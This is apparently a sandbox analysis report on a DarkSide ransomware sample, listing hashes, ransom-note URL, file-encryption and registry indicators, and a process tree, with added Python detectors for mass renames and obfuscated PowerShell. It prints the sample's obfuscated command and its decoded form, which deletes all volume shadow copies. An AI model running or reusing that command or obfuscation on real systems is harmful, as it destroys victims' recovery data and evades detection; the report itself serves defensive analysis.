Analysis
- max time kernel: 122s
- max time network: 142s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 31-01-2022 05:59
Static task: static1
Behavioral task: behavioral1
- Sample: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
- Resource: win10-en-20211208
General
- Target: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
- Size: 59KB
- MD5: 885fc8fb590b899c1db7b42fe83dddc3
- SHA1: c104056f9a926d27a2082f0510c97b09cb0eb3e5
- SHA256: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d
- SHA512: 2b8e49ad84434dcaf98635120ac54bfa7e55bb61bf9d0e3f1f25ab81e950f638311d2121217bf5840834778d5e137551e24b89da02f12dc6be99d755c54f4c13
Malware Config
- Extracted from: C:\\README.5bede5a3.TXT
- Family: darkside
- URL: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Modifies extensions of user files (19 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe (all 19 events)
  description | ioc
  File opened for modification | C:\Users\Admin\Pictures\GroupOut.png.5bede5a3
  File renamed | C:\Users\Admin\Pictures\SetRegister.raw => C:\Users\Admin\Pictures\SetRegister.raw.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\StartUndo.tiff
  File renamed | C:\Users\Admin\Pictures\StartUndo.tiff => C:\Users\Admin\Pictures\StartUndo.tiff.5bede5a3
  File renamed | C:\Users\Admin\Pictures\GroupOut.png => C:\Users\Admin\Pictures\GroupOut.png.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\InitializeSet.raw.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\MeasureDebug.tiff.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\SkipPing.tiff
  File opened for modification | C:\Users\Admin\Pictures\SkipPing.tiff.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\UndoRepair.raw.5bede5a3
  File renamed | C:\Users\Admin\Pictures\GrantAssert.crw => C:\Users\Admin\Pictures\GrantAssert.crw.5bede5a3
  File renamed | C:\Users\Admin\Pictures\InitializeSet.raw => C:\Users\Admin\Pictures\InitializeSet.raw.5bede5a3
  File renamed | C:\Users\Admin\Pictures\MeasureDebug.tiff => C:\Users\Admin\Pictures\MeasureDebug.tiff.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\SetRegister.raw.5bede5a3
  File renamed | C:\Users\Admin\Pictures\SkipPing.tiff => C:\Users\Admin\Pictures\SkipPing.tiff.5bede5a3
  File renamed | C:\Users\Admin\Pictures\UndoRepair.raw => C:\Users\Admin\Pictures\UndoRepair.raw.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\GrantAssert.crw.5bede5a3
  File opened for modification | C:\Users\Admin\Pictures\MeasureDebug.tiff
  File opened for modification | C:\Users\Admin\Pictures\StartUndo.tiff.5bede5a3
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
  Processes: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe (both events)
  description | ioc
  Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5bede5a3.BMP"
  Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5bede5a3.BMP"
- Modifies Control Panel (1 IoC)
  Processes: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  description | ioc
  Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallpaperStyle = "10"
- Modifies registry class (5 IoCs)
  Processes: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe (all 5 events)
  description | ioc
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3
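The two signatures above, "Modifies extensions of user files" and "Modifies registry class", are the file-system side of the encryption run: every user file is renamed to name.ext.5bede5a3 by the same process, and that same process then registers .5bede5a3 under HKLM\SOFTWARE\Classes with a DefaultIcon. The Python below is an added example for this report, not code from the sandbox or from the malware. It replays the report's own rename and "Key created" events (plus one constructed benign rename by explorer.exe) through a mass-rename heuristic and correlates each hit with the registered file class. The event text format, the grouping by (process, appended extension) and the threshold of 5 are the example's own assumptions.

```python
import re
from collections import Counter

# Sample events built from the IoC lines in the "Modifies extensions of user
# files" and "Modifies registry class" sections of this report, plus one
# constructed benign rename (explorer.exe) that must not raise an alert.
PROC = "0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"
PICS = r"C:\Users\Admin\Pictures"
EVENTS = [
    rf"File renamed {PICS}\SetRegister.raw => {PICS}\SetRegister.raw.5bede5a3 {PROC}",
    rf"File renamed {PICS}\StartUndo.tiff => {PICS}\StartUndo.tiff.5bede5a3 {PROC}",
    rf"File renamed {PICS}\GroupOut.png => {PICS}\GroupOut.png.5bede5a3 {PROC}",
    rf"File renamed {PICS}\GrantAssert.crw => {PICS}\GrantAssert.crw.5bede5a3 {PROC}",
    rf"File renamed {PICS}\InitializeSet.raw => {PICS}\InitializeSet.raw.5bede5a3 {PROC}",
    rf"File renamed {PICS}\MeasureDebug.tiff => {PICS}\MeasureDebug.tiff.5bede5a3 {PROC}",
    rf"File renamed {PICS}\SkipPing.tiff => {PICS}\SkipPing.tiff.5bede5a3 {PROC}",
    rf"File renamed {PICS}\UndoRepair.raw => {PICS}\UndoRepair.raw.5bede5a3 {PROC}",
    rf"Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 {PROC}",
    # constructed, not from the report: an ordinary rename by the shell
    r"File renamed C:\Users\Admin\Documents\draft.docx => C:\Users\Admin\Documents\report.docx explorer.exe",
]

RENAME_RE = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+?) (?P<proc>\S+)$")
CLASS_RE = re.compile(
    r"^Key created \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\\.(?P<ext>[^\\\s]+) (?P<proc>\S+)$"
)


def appended_extension(src, dst):
    """Return EXT when dst == src + '.' + EXT (original name kept, one suffix
    appended); None for renames that change the base name or directory."""
    if not dst.startswith(src + "."):
        return None
    ext = dst[len(src) + 1:]
    if not ext or "." in ext or "\\" in ext:
        return None
    return ext


def find_mass_rename(events, threshold=5):
    """Count X -> X.EXT renames per (process, EXT); keep pairs at/above threshold."""
    counts = Counter()
    for line in events:
        m = RENAME_RE.match(line)
        if not m:
            continue
        ext = appended_extension(m["src"], m["dst"])
        if ext is not None:
            counts[(m["proc"], ext)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def registered_extensions(events):
    """(process, ext) pairs for which the process created HKLM\\...\\Classes\\.ext."""
    found = set()
    for line in events:
        m = CLASS_RE.match(line)
        if m:
            found.add((m["proc"], m["ext"]))
    return found


def correlate(events, threshold=5):
    """One alert per (process, ext) with mass renames; the alert also records
    whether the same process registered .ext as a file class (DefaultIcon trick)."""
    registered = registered_extensions(events)
    return [
        {"process": proc, "extension": ext, "renames": n,
         "registered_file_class": (proc, ext) in registered}
        for (proc, ext), n in sorted(find_mass_rename(events, threshold).items())
    ]


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The heuristic fires on the eight renames in the report and stays silent on the explorer.exe rename because the base name changed rather than a suffix being appended. In production telemetry (Sysmon, EDR file events) the same grouping should be windowed by time; the report gives no timestamps, so the example counts over the whole list.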
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
  pid | process
  1404 | powershell.exe
  1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
- Suspicious use of AdjustPrivilegeToken (24 IoCs)
  Processes: 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe (PID 1580), powershell.exe (PID 1404), vssvc.exe (PID 620)
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeSecurityPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeTakeOwnershipPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeLoadDriverPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeSystemProfilePrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeSystemtimePrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeProfSingleProcessPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeIncBasePriorityPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeCreatePagefilePrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeBackupPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeRestorePrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeShutdownPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeDebugPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeSystemEnvironmentPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeRemoteShutdownPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeUndockPrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeManageVolumePrivilege | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: 33 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: 34 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: 35 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
  Token: SeDebugPrivilege | 1404 | powershell.exe
  Token: SeBackupPrivilege | 620 | vssvc.exe
  Token: SeRestorePrivilege | 620 | vssvc.exe
  Token: SeAuditPrivilege | 620 | vssvc.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
  description | pid | process | target process
  PID 1580 wrote to memory of 1404 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe | powershell.exe
  PID 1580 wrote to memory of 1404 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe | powershell.exe
  PID 1580 wrote to memory of 1404 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe | powershell.exe
  PID 1580 wrote to memory of 1404 | 1580 | 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe | powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe (PID 1580, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1404, depth 2, child of PID 1580)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    The loop takes two hex digits at a time from the literal, casts each byte to a char and hands the rebuilt string to iex. It decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    That is, every volume shadow copy is deleted through WMI before encryption; the separate vssvc.exe (Volume Shadow Copy service) process below, with its SeBackup/SeRestore token use, is consistent with that call.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 620, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
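The PowerShell child is the only place this sample leaves a readable command line, and it is obfuscated with a hex-to-char loop rather than the more common -EncodedCommand switch. Replaying the loop offline gives Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. shadow-copy deletion. The Python below is an added example for this report, not code from the sandbox or the malware: it reassembles the recorded command line, decodes that exact construct, also handles the -EncodedCommand (base64 of UTF-16LE) form that this report does not show, and flags the shadow-copy deletion. The regexes and the field names in the result are the example's own assumptions.

```python
import base64
import re
from typing import Optional

# Command line of PID 1404, reassembled from the process tree in this report.
HEX_LITERAL = ("4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
               "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20")
POWERSHELL_CMDLINE = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'"
    + HEX_LITERAL
    + "'.Substring(2*$_,2))};iex $s\""
)

# The construct seen here: (lo..hi)|%{ ... ('0x'+'HEX'.Substring(2*$_,2)) ... }
RANGE_RE = re.compile(r"\((\d+)\.\.(\d+)\)")
HEX_RE = re.compile(r"'0x'\+'([0-9A-Fa-f]+)'\.Substring\(2\*\$_,\s*2\)")
# -e/-ec/-enc/-EncodedCommand <base64 of UTF-16LE script>. "-ep bypass" does
# not match because whitespace must follow the switch itself.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Replay the byte-at-a-time hex loop; None if the construct is absent."""
    m_range, m_hex = RANGE_RE.search(cmdline), HEX_RE.search(cmdline)
    if not (m_range and m_hex):
        return None
    lo, hi = int(m_range.group(1)), int(m_range.group(2))
    hexstr = m_hex.group(1)
    chars = []
    for i in range(lo, hi + 1):          # PowerShell's lo..hi is inclusive
        pair = hexstr[2 * i:2 * i + 2]
        if len(pair) < 2:                # Substring past the end would throw
            break
        chars.append(chr(int(pair, 16)))
    return "".join(chars)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode -EncodedCommand (base64 of UTF-16LE); None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify(cmdline: str) -> dict:
    """Surface each obfuscation layer and whether the payload kills shadow copies."""
    decoded = decode_hex_loop(cmdline)
    if decoded is None:
        decoded = decode_encoded_command(cmdline)
    payload = decoded if decoded is not None else cmdline
    return {
        "decoded": decoded,
        "execution_policy_bypass": bool(re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cmdline, re.I)),
        "hex_char_loop": HEX_RE.search(cmdline) is not None,
        "encoded_command": ENC_RE.search(cmdline) is not None,
        "invoke_expression": bool(re.search(r"\biex\b|invoke-expression", cmdline, re.I)),
        "shadow_copy_deletion": bool(
            re.search(r"win32_shadowcopy", payload, re.I)
            and re.search(r"\.delete\(\)", payload, re.I)
        ),
    }


if __name__ == "__main__":
    print(classify(POWERSHELL_CMDLINE))
```

Nothing in the example executes the decoded script; it only reconstructs the string the sample fed to iex. The hex-loop regex is pinned to this sample's exact spelling (variable name, Substring arguments), so a variant that renames $s or indexes differently needs the pattern widened; the vssadmin/wmic forms of the same action are not covered here because this report does not show them.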
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 3b80d40a65e03e035cf76129c11559b9
  SHA1: 6a357bbb32fc88785a60ece81252cbd1920828a1
  SHA256: c61b7f0113737d5cb04c167555cfc664858200a6379c6a76ef7b8e17f9b10d52
  SHA512: 75669dffe481137d0ed199522a352aab20b746b7c556a6f0e92aea58cf6e012824615672a76d68a94b5f6477bbe8ea2e83868e34269c841cc695b3f20eecc26d
- memory/1404-55-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
  Filesize: 8KB
- memory/1404-58-0x0000000002482000-0x0000000002484000-memory.dmp
  Filesize: 8KB
- memory/1404-59-0x0000000002484000-0x0000000002487000-memory.dmp
  Filesize: 12KB
- memory/1404-57-0x0000000002480000-0x0000000002482000-memory.dmp
  Filesize: 8KB
- memory/1404-56-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp
  Filesize: 11.4MB
- memory/1404-60-0x000000000248B000-0x00000000024AA000-memory.dmp
  Filesize: 124KB
- memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp
  Filesize: 8KB